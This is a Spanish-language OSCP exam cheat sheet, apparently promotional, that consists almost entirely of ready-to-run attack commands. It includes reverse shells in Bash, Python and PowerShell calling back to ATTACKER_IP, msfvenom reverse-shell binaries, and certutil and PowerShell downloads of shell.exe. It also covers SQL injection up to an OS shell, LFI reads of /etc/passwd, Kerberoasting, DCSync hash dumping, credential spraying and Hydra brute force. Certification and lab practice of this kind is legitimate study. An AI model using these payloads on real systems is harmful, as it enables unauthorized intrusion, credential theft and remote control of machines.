# Enumeración
La enumeración lo es todo en el OSCP. Dedica el 80% de tu tiempo aquí. Escanea todos los puertos, enumera todos los servicios.
Nmap — Estrategia de escaneo completo
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
Paso 1: Escaneo rápido de todos los puertos TCP para descubrir puertos abiertos
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
Paso 2: Escaneo dirigido con scripts + detección de versión en los puertos descubiertos
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
¡No olvides UDP! Escanea los 200 puertos UDP más comunes
Enumeración Web
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
Fuerza bruta de directorios con extensiones comunes (php, txt, bak son oro en OSCP)
whatweb http://TARGET && curl -s http://TARGET -I
Identificar tecnologías web y cabeceras del servidor
nikto -h http://TARGET -C all
Escáner de vulnerabilidades web — encuentra misconfiguraciones y archivos por defecto
Enumeración SMB
smbclient -N -L //TARGET
Listar recursos compartidos SMB con sesión nula (sin contraseña)
enum4linux-ng -A TARGET
Enumeración completa SMB/RPC — usuarios, recursos, grupos, política de contraseñas
crackmapexec smb TARGET -u '' -p '' --shares
Enumerar recursos compartidos legibles con CrackMapExec
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
SNMP walk con community string "public" — puede filtrar nombres de usuario, procesos
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
Consulta LDAP anónima para enumerar usuarios del dominio
dig axfr @TARGET DOMAIN.LOCAL
Intento de transferencia de zona DNS
# Explotación Web
Inyección SQL, bypass de upload, inyección de comandos — lo fundamental de las boxes web OSCP.
Inyección SQL
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
Detección automática de SQLi — enumerar bases de datos
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
SQLi desde petición Burp — obtener un shell del SO si es posible
Bypass de subida de archivos
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Bypass de doble extensión — subir como .php.jpg
Inyección de comandos
; whoami
Prueba básica de inyección de comando (prueba también | whoami, `whoami`, $(whoami))
Inclusión de archivos (LFI/RFI)
curl "http://TARGET/page?file=../../../etc/passwd"
LFI — leer /etc/passwd mediante path traversal
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
Wrapper PHP filter — leer código fuente como base64
# Shells y Payloads
Reverse shells, bind shells y generación de payloads — apréndetelos de memoria para el examen.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell Bash — el clásico
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell Python3
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Reverse shell PowerShell — para objetivos Windows
Mejora del shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Paso 1: Generar un shell PTY
export TERM=xterm && stty raw -echo; fg
Paso 2: TTY interactivo completo (Ctrl+Z primero, luego ejecuta esto)
Payloads Msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
EXE reverse shell Windows x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
Binario ELF reverse shell Linux x64
# Escalada de privilegios Linux
El OSCP ama el privesc Linux. Comprueba SUID, capabilities, cron jobs, rutas escribibles, versión del kernel.
💡 Consejo OSCP: Siempre ejecuta LinPEAS primero. Luego verifica manualmente los hallazgos.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Ejecutar LinPEAS directamente — resalta vectores de privesc en color
find / -perm -4000 -type f 2>/dev/null
Encontrar todos los binarios SUID — verifica cada uno en GTFOBins
sudo -l
Verificar qué puedes ejecutar como root — el vector de privesc #1
getcap -r / 2>/dev/null
Encontrar binarios con capabilities (cap_setuid = root instantáneo)
cat /etc/crontab && ls -la /etc/cron*
Verificar cron jobs — ¿scripts escribibles ejecutándose como root?
find / -writable -type f 2>/dev/null | grep -v proc
Encontrar archivos escribibles por todos — potencial de path hijacking
uname -a && cat /etc/os-release
Verificar versión del kernel — buscar exploits de kernel
# Escalada de privilegios Windows
Servicios, tokens, AlwaysInstallElevated, rutas de servicios sin comillas, potatoes — los clásicos OSCP.
💡 Consejo OSCP: Ejecuta WinPEAS + PowerUp.ps1 — juntos detectan la mayoría de vectores.
.\winPEASx64.exe
WinPEAS — verificación automatizada de escalada de privilegios Windows
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — encuentra misconfiguraciones, permisos débiles, rutas sin comillas
whoami /priv
Verificar privilegios del token actual — ¿SeImpersonate? ¿SeBackup?
.\GodPotato.exe -cmd "cmd /c whoami"
GodPotato — SYSTEM instantáneo desde SeImpersonatePrivilege (funciona en Windows modernos)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Verificar AlwaysInstallElevated — si es 1, genera payload MSI para SYSTEM
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Encontrar rutas de servicios sin comillas — potencial de hijacking de binario
# Active Directory
AD es una parte importante del OSCP desde la actualización de 2023. Kerberoasting, AS-REP roasting, DCSync y movimiento lateral.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
Recolección BloodHound — mapear todas las rutas de ataque AD
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
Kerberoasting — extraer hashes de tickets de servicio para cracking offline
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
AS-REP Roasting — encontrar cuentas sin pre-autenticación Kerberos
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
PsExec — obtener shell SYSTEM con credenciales admin válidas
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
DCSync — extraer todos los hashes del dominio (requiere DA o derechos de replicación)
evil-winrm -i TARGET_IP -u USER -p PASS
Shell WinRM — funciona cuando el puerto 5985 está abierto
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
Spray de credenciales en la red — encontrar dónde tienes acceso
# Pivoting y Tunneling
Alcanzar redes internas a través de hosts comprometidos. Chisel, túneles SSH, ligolo — imprescindible para OSCP.
Chisel (Recomendado)
./chisel server -p 8080 --reverse
En tu Kali: iniciar servidor Chisel en modo reverse
./chisel client ATTACKER_IP:8080 R:socks
En el objetivo: conexión de vuelta, crea proxy SOCKS5 en puerto 1080 de Kali
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Escanear red interna a través del proxy SOCKS
Túneles SSH
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
Port forward local — acceder al web interno en localhost:8080
ssh -D 1080 user@PIVOT_IP
Proxy SOCKS dinámico por SSH — usar con proxychains
# Ataques de contraseñas
Crackear hashes, fuerza bruta de logins — hashcat y John son tus mejores aliados.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
Crackear hashes Kerberoast (TGS-REP tipo 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
Crackear hashes AS-REP roast
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John the Ripper — detecta automáticamente el tipo de hash y crackea
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Fuerza bruta de login web con Hydra
# Transferencia de archivos
Llevar herramientas al objetivo y exfiltrar datos. Múltiples métodos para diferentes situaciones.
Objetivos Linux
python3 -m http.server 8000
En Kali: iniciar servidor HTTP para servir archivos
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
En el objetivo: descargar y dar permisos de ejecución
Objetivos Windows
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
Descarga con Certutil — funciona en la mayoría de versiones de Windows
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
Descarga PowerShell — alternativa a certutil
# Consejos para el examen OSCP
Estrategia y mentalidad para las 23h45 de examen. Estos consejos vienen de cientos de experiencias OSCP.
⏱️ Gestión del tiempo: No pases más de 2 horas en una sola máquina. Si estás atascado, pasa a otra y vuelve después con ojos frescos.
📝 Documenta todo: Haz capturas de pantalla en cada paso. No dejes el informe para el final — pega las evidencias en tu plantilla durante el examen.
🎯 Empieza por las boxes fáciles: Las máquinas standalone (no-AD) suelen ser más rápidas de rootear. Asegura esos puntos primero.
🔁 Enumera más profundamente: Si estás atascado, no has enumerado lo suficiente. Relanza escaneos con otras wordlists, revisa todos los puertos, mira el código fuente.
🏠 Set AD = 40 puntos: La cadena AD es el bloque de puntos más grande. Practica con boxes AD en HackTheBox y TryHackMe antes del examen.
💤 Toma descansos: Duerme 2-4 horas durante el examen. Volver descansado suele llevar a resolver lo que te tenía atascado.
¿Quieres los 11.600+ comandos?
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 11.600+ comandos en 32 categorías con búsqueda instantánea y copia en un clic.
Prueba gratis 7 días →